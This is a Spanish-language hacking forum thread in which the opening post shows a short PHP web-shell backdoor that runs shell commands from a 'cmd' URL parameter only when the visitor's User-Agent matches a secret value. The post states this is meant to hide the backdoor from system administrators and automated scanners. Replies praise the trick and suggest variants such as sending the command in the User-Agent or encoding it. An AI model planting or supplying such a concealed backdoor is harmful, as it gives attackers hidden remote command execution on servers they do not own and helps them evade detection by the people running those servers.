Ocultando Backdoor a través del User-Agent

  • 5 Respuestas
  • 4115 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1967
  • Actividad:
    63.33%
  • Country: es
  • Reputación 16
    • Ver Perfil

Ocultando Backdoor a través del User-Agent

  • en: Julio 08, 2015, 10:50:09 am
Como todos sabemos, esconder un backdoor a veces no es un trabajo sencillo, ya que, sin contar de que el sysadmin sea inteligente, hay scripts automatizados que se encargan de buscar este tipo de backdoors.

Así que, un método para evitar esto, es jugar con el User-Agent de nuestro navegador.

Con un código bastante simple, podemos proteger nuestro backdoor de visitas indeseadas:

Código: PHP
  1. <?php
  2. if ($_SERVER['HTTP_USER_AGENT'] == "blackdrake")
  3. {
  4.    @You are not allowed to view links. Register or Login($_GET['cmd']);
  5. }
  6. ?>

De este modo, con una visita normal, no podremos ejecutar los comandos:


En cambio, modificando el User-Agent por blackdrake, si que podremos:



Algo muy sencillo pero que a algunos le vendrá bastante bien.

Un saludo.


Desconectado Hu3c0

  • *
  • Underc0der
  • Mensajes: 433
  • Actividad:
    0%
  • Reputación 0
  • In the middle Netbeans
    • Ver Perfil

Re:Ocultando Backdoor a través del User-Agent

  • en: Julio 08, 2015, 05:15:09 pm
Muy bueno mi joven amigo sencillo y funcional ...!!
You are not allowed to view links. Register or Login

Desconectado EPSILON

  • *
  • Ex-Staff
  • *****
  • Mensajes: 363
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
  • [email protected]
  • Skype: epsilon.root1
    • Ver Perfil

Re:Ocultando Backdoor a través del User-Agent

  • en: Julio 10, 2015, 08:39:21 am
Muy bueno @You are not allowed to view links. Register or Login ! Un script sencillo, pero la idea le va a servir a más de uno. Gracias!

Saludos!

Desconectado fermino

  • *
  • Ex-Staff
  • *****
  • Mensajes: 330
  • Actividad:
    0%
  • Reputación 1
  • Aprendiz de todo, maestro de nada...
    • Ver Perfil
    • In The Middle Of Knowledge

Re:Ocultando Backdoor a través del User-Agent

  • en: Agosto 05, 2015, 12:06:54 pm
Y pasar el mismísimo comando en el User-Agent? :P
Visita mi blog: You are not allowed to view links. Register or Login.

Desconectado WhiZ

  • *
  • Ex-Staff
  • *****
  • Mensajes: 395
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Ocultando Backdoor a través del User-Agent

  • en: Agosto 05, 2015, 12:26:59 pm
You are not allowed to view links. Register or Login
Y pasar el mismísimo comando en el User-Agent? :P

Para eso habría que modificar constantemente el UA. Lo más cómodo es hacerlo de esta forma, supongo.

No había visto este aporte. Gracias @You are not allowed to view links. Register or Login!

Saludos!
WhiZ


Desconectado [Kounterfeit]

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
  • XMPP: [email protected]
    • Yahoo Instant Messenger - kounterfeit@lsd-25.ru
  • Skype: [email protected]
  • Twitter: @dmt_ez
    • Ver Perfil
    • Email

Re:Ocultando Backdoor a través del User-Agent

  • en: Septiembre 11, 2015, 09:58:29 pm
buena, hace rato que queria probar si se puede encodear el contenido para variar  ;D , buen aporte!

 

Como hacer un backdoor con weevely

Iniciado por unkdown

Respuestas: 8
Vistas: 5284
Último mensaje Diciembre 01, 2015, 06:28:51 pm
por unkdown
Ataques DDos a través de XSS Persistente By @alvarodh5

Iniciado por blackdrake

Respuestas: 5
Vistas: 5111
Último mensaje Noviembre 27, 2015, 11:36:26 am
por NikoMdq